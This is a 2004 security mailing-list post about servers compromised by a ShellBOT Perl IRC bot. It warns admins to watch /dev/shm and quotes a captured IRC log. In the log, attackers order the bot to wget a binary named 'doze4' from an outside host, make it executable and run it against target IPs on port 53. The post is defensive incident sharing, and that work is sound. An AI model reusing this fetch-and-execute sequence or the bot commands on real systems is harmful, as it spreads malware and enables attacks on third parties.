Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Systems compromised with ShellBOT perl script - part 2

From: "nathan c. dickerson" <nathan () pro net>
Date: Thu, 16 Sep 2004 15:47:38 -0700
These are the same guys, using the same exploits that I've dealt with many moons ago. 

sly and juntz

same guys, same tricks

make sure you watch your /dev/shm directories..

-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4


<- PRIVMSG #brdata :doze4: no process killed
-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4
<- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget
http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :--13:52:35--  http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :           => `doze4'
<- PRIVMSG #brdata :Resolving members.lycos.co.uk... done.
<- PRIVMSG #brdata :Connecting to
members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4
<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such
file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4
81.29.36.147 53 www.ibm.com
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4
65.248.51.13 53 www.ibm.com
<- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory
Previous By Date Next
Previous By Thread Next

Current thread: